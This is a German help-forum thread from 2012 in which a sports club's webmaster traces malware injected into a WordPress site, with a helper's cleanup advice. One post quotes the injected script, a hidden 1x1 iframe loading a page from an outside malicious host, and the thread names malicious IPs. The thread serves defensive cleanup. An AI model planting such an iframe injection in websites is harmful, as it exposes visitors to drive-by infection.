|
Alles rund um Windows: Trojaner auf WebsiteWindows 7 Hilfe zu allen Windows-Betriebssystemen: Windows XP, Windows Vista, Windows 7, Windows 8(.1) und Windows 10 / Windows 11- als auch zu sämtlicher Windows-Software. Alles zu Windows 10 ist auch gerne willkommen. Bitte benenne etwaige Fehler oder Bluescreens unter Windows mit dem Wortlaut der Fehlermeldung und Fehlercode. Erste Schritte für Hilfe unter Windows. |
08.02.2012, 18:33 | #1 |
| Problem: Trojaner auf Website Hallo Leute, und zwar scheint es so als ob wir einen Trojaner auf unserer Vereinswebsite haben. (hxxp://www.ttcelbe.de/) Es gibt verschiedene Symptome: Virenscanner meldet Viren, Java stürzt ab, WMP öffnet sich plötzlich, kurz nach Öffnen der Seite werden teilweise auch auf den jeweiligen Rechnern Viren gefunden. Es gab eine Meldung des Trojaners "Exploit-CVE2010-0806" und die IP-Adressen von "hxxp://194.60.242.36/sv/count.php?add=1" bzw. "hxxp://194.60.242.166" werden als schädlich erkannt. Der Hoster hat bei sich schon einen Virenscan durchgeführt, war aber fehlerfrei. Könnt ihr mir weiterhelfen? Viele Grüße Clemens |
08.02.2012, 18:50 | #2 |
/// Mr. Schatten | Trojaner auf Website Anleitung / Hilfe Ja, möglich.
__________________Aber eigentlich sollte dies euer Webmaster tun und können. Man müsste auch wissen, was wurde bereits getan bzw. wurde schon was getan? Zumindest auf der Startseite befinden sich wohl Code-Reste die dort auf jeden Fall falsch sind - könnte aber die unsaubere und unvollendete Säuberung von der eventuellen Malware sein. 194.60.242.36 ist auf jeden Fall in Sibirien. Auf welcher Seite kommt denn die Virenwarnung?
__________________ |
08.02.2012, 19:18 | #3 |
| Trojaner auf Website Details Einzige was bisher getan wurde, das Plugin von Google Analytics gelöscht, weil das da stand, als ich auf eine der IP-Adressen gegangen bin, aber hatte wohl eher weniger damit zu tun.
__________________Die Meldung kommt bei jeder Seite, die man öffnet. Ist ja die Frage, ob unbewusst irgendeine schädliche Datei hochgeladen wurde, die zu löschen ist oder sich jmd eingehackt hat und was eingepflanzt hat. |
08.02.2012, 20:14 | #4 |
/// Mr. Schatten | Lösung: Trojaner auf Website Möglicherweise/wahrscheinlich sitzt die Malware im "Theme" => ...ttcelbe.de/wordpress/wp-content/themes/traction_pro/javascripts/ traction . js Zeile 9
__________________ alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung keine Hilfe via PN hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort - |
08.02.2012, 20:43 | #5 |
| Wie Trojaner auf Website Cool, danke! Das scheint es wirklich gewesen zu sein, die eine Zeile wurde dort neu hinzugefügt und jetzt werden keine Meldungen mehr angezeigt. Wie bist du auf die Datei gekommen? |
08.02.2012, 20:59 | #6 | |
/// Mr. Schatten | Wo Trojaner auf Website Lösung! Ohne JavaScript war nichts. Direkte Links und in den Seiten (im Quelltext) sich befindende Scripts (bzw. der Quelltext an sich) schienen sauber zu sein, meinem Auge ist nichts aufgefallen außer auf der Startseite ganz unten nach </body> und </html> befindet sich noch ein </div>. Dies hat dort nichts zu suchen. Allerdings ist dort unten "gerne" fremder ("illegaler") Content, deshalb habe ich u.a. dort manuell einfach im Quelltext nachgesehen. Also musste die Malware in einem "externen" Script sein. Und weil mir es zu blöd war da alles manuell zu durchsuchen, habe ich zu meiner Linklesezeichenliste gegriffen. http://sitecheck.sucuri.net/scanner/ Und die Zeile 9 hat auch (dann) das typische Aussehen eines maliciösen Inhalts gehabt. BTW: Zitat:
__________________ --> Trojaner auf Website |
09.02.2012, 11:26 | #7 |
| Trojaner auf Website Achso alles klar, die Seite muss ich mir gleich mal merken ;-) Ist es jetzt auch am sinnvollsten FTP-PW etc. zu ändern? |
10.02.2012, 09:56 | #8 |
/// Mr. Schatten | Trojaner auf Website Ja, unbedingt das FTP-Passwort (alle!) ändern. Also die Passwörter aller (!) FTP-Zugänge zu dieser Internet-Präsenz und außerdem sollten ALLE PCs, auf denen ein FTP-Zugang zu dieser Internetpräsenz eingerichtet ist, sorgfältig und tiefgehend überprüft werden und zumindest auf dem ursächlichen PC auch wiederum alle FTP-Passwörter geändert werden.
__________________ alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung keine Hilfe via PN hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort - |
27.06.2012, 12:44 | #9 |
| Trojaner auf Website Hey, ich muss mich jetzt nach einiger Zeit nochmals melden. Gleiche Website - ähnliches Problem. Ich weiß nicht, ob es noch Überreste der letzten Malware sind oder ob es wieder etwas neues ist. Jedenfalls wurde unsere Website nun von Google gesperrt. Jedoch ist sie (meist) nur im FF nicht erreichbar. Problem, was ich bisher gefunden habe - fremder Code am Ende der Startseite: Code:
ATTFilter <script>var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script> Danke für eure Hilfe... clemixx |
27.06.2012, 13:13 | #10 |
/// Mr. Schatten | Trojaner auf Website [gelöst] Du hättest dir BEVOR du was verändert hattest, einfach mal Datum und Uhrzeit ansehen sollen. Es ist immer auch ein Möglichkeit, dass ein Hoster eines Multidomainservers tatsächlich auch ein grundlegendes Problem hat, dann sollten aber eher alle Domains/Websites auf mindestens diesem einem Server betroffen sein. An sich ist meines Wissens dein Hoster aber nicht als dunkleres Schaf (grau oder schwarz) bekannt. Allerdings können falsche Rechtevergabe und veraltete Serversoftware, PHP-Versionen und darauf aufsetzende Anwendungen schon auch Lücken schaffen. Und mancher Hoster belässt auf alten Verträgen/alten Servern auch längst grob veraltete Software.
__________________ alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung keine Hilfe via PN hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort - |
27.06.2012, 13:31 | #11 |
| Trojaner auf Website [gelöst] Von allen hab ich das nicht getan, aber bei den Hauptdateien war nichts auffälliges. Ja dächte ich eigentlich auch nicht, aber da es nun doch anscheinend bei einigen Websites diese Probleme gibt und sich der Hoster auch nicht auf meine Nachfragen meldet..! Muss ja auch nur mindestens dieser eine Server betroffen sein.. Noch etwas, was ich an meiner Stelle jetzt tun kann? |
27.06.2012, 14:08 | #12 |
/// Mr. Schatten | Trojaner auf Website [gelöst] Augen auf und eine neue Seitenüberprüfung bei Google beantragen. Du magst einfach mal bei den dir bekannten Websites mit ähnlichem/gleichem Problem schauen, ob sie auf dem selben Server liegen ping domain-name.tld Darüber hinaus kontrolliere ob Server-Software (Webserver, PHP etc.) aktuell ist. Wenn nicht, sprich deinen Hoster mal auf eine Aktualisierung an, es ist aber Branchenüblich, dass die Software gerne auf dem Stand des Vertragsabschlusses bleibt (vorallem wenn der alte Vertrag irgendwo besser ist, du also für diese Leistung UND neues PHP (als Beispiel) etwas mehr zahlen musst).
__________________ alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung keine Hilfe via PN hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort - |
27.06.2012, 15:16 | #13 |
| Trojaner auf Website [gelöst] Das klingt alles nach Vorsichtsmaßnahmen, das Ding ist nur, dass die Seite z.Zt. nicht erreichbar ist. Seitenüberprüfung von Google habe ich auch schon vor mehreren Tagen beantragt, da regt sicht nix. Ist es denn sonst zuverlässig?! Also der Großteil der betroffenen Websites liegt tatsächlich auf dem gleichen Server. Ja das ist richtig, die Software ist nicht die aktuellste, könnte man in Zukunft aktualisieren. |
27.06.2012, 16:43 | #14 | |
/// Mr. Schatten | Trojaner auf Website [gelöst]Zitat:
Erreichbar ist die Site (technisch) natürlich schon, nur nicht über die Google-Suche und nicht direkt und ohne Warnhinweis über Browser, die sich auf Googles Warnung verlassen.
__________________ alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung keine Hilfe via PN hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort - |
27.06.2012, 17:37 | #15 |
| Trojaner auf Website [gelöst] Naja erreichbar ist sie vlt, aber sollte man ja aufrgund der Malware schon meiden, was? So nachdem ich im Wordpress-Verzeichnis ewig nach Infektionen gesucht habe, habe ich nun gesehen, dass sich im root noch eine index.php befindet, in der relativ lange Zeichenketten eingebunden waren, die so da nicht hingehörten. Ob die wohl durch ein Plug-In, der (leicht) veralteten Software auf dem Server oder anderes dahin gelangt sind, weiß ich nicht. Aber jetzt sollte es zumindest wieder gehen. |
Themen zu Trojaner auf Website |
durchgeführt, ip-adresse, java, leute, melde, meldet, meldung, plötzlich, rechner, rechnern, scan, scanner, schei, seite, stürzt, stürzt ab, troja, trojaner, trojaners, verschiedene, virenscan, virenscanner, website, weiterhelfen, wmp, öffnet |